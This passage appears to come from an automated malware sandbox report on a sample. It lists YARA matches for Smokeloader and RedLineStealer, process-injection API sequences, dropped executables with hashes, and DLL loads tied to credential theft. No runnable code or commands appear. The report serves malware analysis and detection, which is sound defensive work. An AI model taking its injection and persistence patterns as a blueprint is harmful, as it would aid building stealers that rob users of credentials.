                Source: 00000000.00000002.2135693322.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000006.00000002.2414876922.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000006.00000002.2410927648.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 0000002B.00000002.2973148017.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000008.00000002.2377117424.00000000023CC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 0000001E.00000002.2687018524.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000024.00000002.2584664956.0000000002800000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 0000001E.00000002.2686652141.0000000002B4F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
                Source: C:\Users\user\AppData\Local\Temp\356F.exe, type: DROPPEDMatched rule: Detects downloader / injector Author: ditekSHen
                PE file contains section with special chars
                Source: FE8B.exe.2.drStatic PE information: section name: .vmp@3
                Source: FE8B.exe.2.drStatic PE information: section name: .vmp@3
                Source: FE8B.exe.2.drStatic PE information: section name: .vmp@3
                PE file has a writeable .text section
                Source: vbsmartcardviewer.exe.21.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: ObjectSerialization65.exe.26.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\AppData\Local\Temp\572.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401553
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_00401561 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401561
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040156B
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_0040156F NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040156F
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_00401729 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401729
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_004023E5 NtQuerySystemInformation,0_2_004023E5
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401583
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401587
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_004026A0 NtEnumerateKey,0_2_004026A0
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401553
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_00401561 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401561
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_0040156B
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_0040156F NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_0040156F
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_00401729 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401729
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_004023E5 NtQuerySystemInformation,6_2_004023E5
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401583
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401587
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_004026A0 NtEnumerateKey,6_2_004026A0
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_02590110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,8_2_02590110
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 10_2_00409543 GetWindowsDirectoryW,NtAllocateVirtualMemory,EnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,LeaveCriticalSection,LdrEnumerateLoadedModules,10_2_00409543
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 10_2_0040E48D NtQuerySystemInformation,10_2_0040E48D
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 10_2_00401B2C NtQueryInformationProcess,10_2_00401B2C
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04FEF9BA NtCreateThreadEx,14_2_04FEF9BA
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 16_2_00409543 GetWindowsDirectoryW,NtAllocateVirtualMemory,EnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,LeaveCriticalSection,LdrEnumerateLoadedModules,16_2_00409543
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 16_2_00401B2C NtQueryInformationProcess,16_2_00401B2C
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 16_2_004023F2 LoadLibraryA,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadLibraryA,NtShutdownSystem,16_2_004023F2
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 16_2_0040E48D NtQuerySystemInformation,16_2_0040E48D
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00423B94 NtdllDefWindowProc_A,18_2_00423B94
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004125E8 NtdllDefWindowProc_A,18_2_004125E8
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004789DC NtdllDefWindowProc_A,18_2_004789DC
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004573CC PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,18_2_004573CC
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0042F530 NtdllDefWindowProc_A,18_2_0042F530
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 10_2_0040B453: DeviceIoControl,10_2_0040B453
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 16_2_004023F2 LoadLibraryA,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadLibraryA,NtShutdownSystem,16_2_004023F2
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: 17_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,17_2_00409448
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,18_2_004555D0
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_0040FC558_2_0040FC55
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_004074BE8_2_004074BE
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005D011C8_2_005D011C
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005CE10E8_2_005CE10E
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005CF5388_2_005CF538
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005D0E3E8_2_005D0E3E
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005D06968_2_005D0696
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005CFA898_2_005CFA89
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_0040F7C08_2_0040F7C0
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_004103C58_2_004103C5
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_0040FFF38_2_0040FFF3
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005CEFE98_2_005CEFE9
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005D03978_2_005D0397
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_004107AD8_2_004107AD
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005D27A18_2_005D27A1
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04EB555414_2_04EB5554
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04EB18E814_2_04EB18E8
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04EB112014_2_04EB1120
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04EB1EB014_2_04EB1EB0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04EB313414_2_04EB3134
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04EB540814_2_04EB5408
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04EB1EC414_2_04EB1EC4
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04FE49F014_2_04FE49F0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04FE4CF014_2_04FE4CF0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04FEE4C014_2_04FEE4C0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04FEF9BA14_2_04FEF9BA
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04FE10A014_2_04FE10A0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04FEF26014_2_04FEF260
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04FE163014_2_04FE1630
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04FEDF2014_2_04FEDF20
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04FEE1FE14_2_04FEE1FE
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04FE18E014_2_04FE18E0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04FE45C014_2_04FE45C0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04FE136014_2_04FE1360
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04FEEE5014_2_04FEEE50
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04FE433014_2_04FE4330
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04FEF53014_2_04FEF530
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: 17_2_0040840C17_2_0040840C
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0043036C18_2_0043036C
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004804C618_2_004804C6
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004444D818_2_004444D8
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004345D418_2_004345D4
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0048660418_2_00486604
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0047095018_2_00470950
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00444A8018_2_00444A80
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00430EF818_2_00430EF8
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0044517818_2_00445178
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004352D818_2_004352D8
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0045F43018_2_0045F430
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0045B4D818_2_0045B4D8
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0048756418_2_00487564
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0044558418_2_00445584
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0046977018_2_00469770
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0046771018_2_00467710
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0048D8C418_2_0048D8C4
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004519A818_2_004519A8
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0043DD6018_2_0043DD60
                Source: Joe Sandbox ViewDropped File: C:\ProgramData\Drivers\csrss.exe A1480E23BD2A89B188FB01138EF2F54130F2DC41CE85FF9319AB7F15471B0011
                Source: Joe Sandbox ViewDropped File: C:\ProgramData\ObjectSerialization65\ObjectSerialization65.exe EC88B7D9AAB10E45DC4AC1AAFFA5D9DA9BF2E368580BDDF16F0DDE301E97B43F
                Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00405964 appears 116 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00408C14 appears 45 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00406ACC appears 41 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00403400 appears 61 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00445DE4 appears 45 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 004078FC appears 43 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 004344EC appears 32 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00403494 appears 82 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00457D58 appears 73 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00453330 appears 93 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00457B4C appears 98 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 00403684 appears 221 times
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: String function: 004460B4 appears 59 times
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: String function: 00401DE0 appears 32 times
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100
                Source: 1EB9.exe.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: 1EB9.tmp.17.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: 1EB9.tmp.17.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                Source: 1EB9.tmp.17.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: 1EB9.tmp.17.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                Source: 1EB9.tmp.20.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: 1EB9.tmp.20.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                Source: 1EB9.tmp.20.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: 1EB9.tmp.20.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                Source: is-C4TNB.tmp.21.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: is-C4TNB.tmp.21.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                Source: is-C4TNB.tmp.21.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: is-C4TNB.tmp.21.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                Source: is-399KA.tmp.21.drStatic PE information: Number of sections : 11 > 10
                Source: is-S9GPV.tmp.21.drStatic PE information: Number of sections : 11 > 10
                Source: is-VN2OC.tmp.21.drStatic PE information: Number of sections : 11 > 10
                Source: is-1HD49.tmp.21.drStatic PE information: Number of sections : 11 > 10
                Source: is-1P6UB.tmp.21.drStatic PE information: Number of sections : 11 > 10
                Source: BroomSetup.exe.31.drStatic PE information: Number of sections : 11 > 10
                Source: is-IJL2N.tmp.21.drStatic PE information: Number of sections : 11 > 10
                Source: S23UhdW5DH.exe, 00000000.00000000.2058750766.0000000000440000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWonder4 vs S23UhdW5DH.exe
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rghwvveSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rghwvveSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rghwvveSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: csunsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: swift.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: nfhwcrhk.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: surewarehook.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: csunsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: aep.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: atasi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: swift.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: nfhwcrhk.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: nuronssl.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: surewarehook.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: ubsec.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: aep.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: atasi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: swift.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: nfhwcrhk.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: nuronssl.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: surewarehook.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: ubsec.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: comsvcs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: cryptsp.dllJump to behavior
